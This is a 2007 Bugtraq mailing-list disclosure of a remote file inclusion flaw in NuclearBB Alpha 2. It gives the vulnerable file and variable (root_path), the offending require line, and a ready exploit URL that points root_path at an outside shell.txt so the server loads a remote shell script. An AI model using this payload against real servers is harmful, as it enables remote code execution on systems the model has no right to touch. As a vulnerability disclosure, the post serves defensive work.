Bugtraq mailing list archives
NuclearBB Alpha 2 Remote File Inclusion
From: b14ck1c3 () hotmail com
Date: 11 Sep 2007 07:12:00 -0000
Vuln Product: NuclearBB Alpha 2 Vendor: http://www.nuclearbb.com/ Vulnerability Type: Remote File Inclusion Autor: Infection Team: Rootshell Security Team Vulnerable file: /NuclearBB/tasks/send_queued_emails.php Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt? Method: get Register_globals: On Vulnerable variable: root_path Line number: 14 Lines: ---------------------------------------------- require("$root_path/inc/functions_email.php"); $mail = new email; ----------------------------------------------
Current thread:
- NuclearBB Alpha 2 Remote File Inclusion b14ck1c3 (Sep 11)